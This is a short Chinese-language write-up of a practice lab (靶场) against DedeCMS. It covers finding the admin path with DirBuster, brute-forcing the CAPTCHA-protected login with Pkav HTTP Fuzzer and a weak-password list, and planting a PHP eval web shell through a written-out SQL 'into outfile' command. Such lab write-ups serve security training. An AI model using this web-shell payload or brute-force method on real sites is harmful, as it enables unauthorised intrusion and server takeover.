靶场地址:
https://www.mozhe.cn/bug/detail/UFZ4K3FhM0JudDdyempzazhreGlBZz09bW96aGUmozhe
试着访问dedecms后台的默认路径/dede/,失败,尝试猜解其他也猜解不出,使用DirBuster爆破路径
data:image/s3,"s3://crabby-images/0597f/0597f3b81ce34c5279d09ba66770d042e6087cc8" alt=""
爆破出/manager,访问http://ip/manager/ 发现后台地址
data:image/s3,"s3://crabby-images/b5d2b/b5d2b7f5f23a3088584696c54b959a7a318d39e3" alt=""
尝试弱密码登录,试了一些都没试出来,使用BurpSuite爆破,发现验证码会更新,没办法只能用Pkav HTTP Fuzzer来爆破了,使用的字典是弱密码top1000。
data:image/s3,"s3://crabby-images/b66a8/b66a8cb3ff602e079514eb7f2bd35c5774a11cf9" alt=""
由于验证码的清晰度非常低,识别经常出错,跑了很多次,也用了很多时间,最后跑出来密码是password,哇的一声哭了出来,这个都没猜到,用了我那么多时间
data:image/s3,"s3://crabby-images/37e99/37e99b96309ecaa6fbce28bb56efb9cd6543dfb5" alt=""
登录到后台,利用sql命令执行写入一句话木马,接着使用菜刀连接获得key
sql命令:select '<?php @eval($_POST[cmd])?>' into outfile '/var/www/html/cmd.php'
data:image/s3,"s3://crabby-images/b3edc/b3edcacf9694fb87a35b2e8bc93f42ff12287acf" alt=""
data:image/s3,"s3://crabby-images/9888e/9888e8f1ddf4fe6f72461eeff872a931a45ad4be" alt=""
网友评论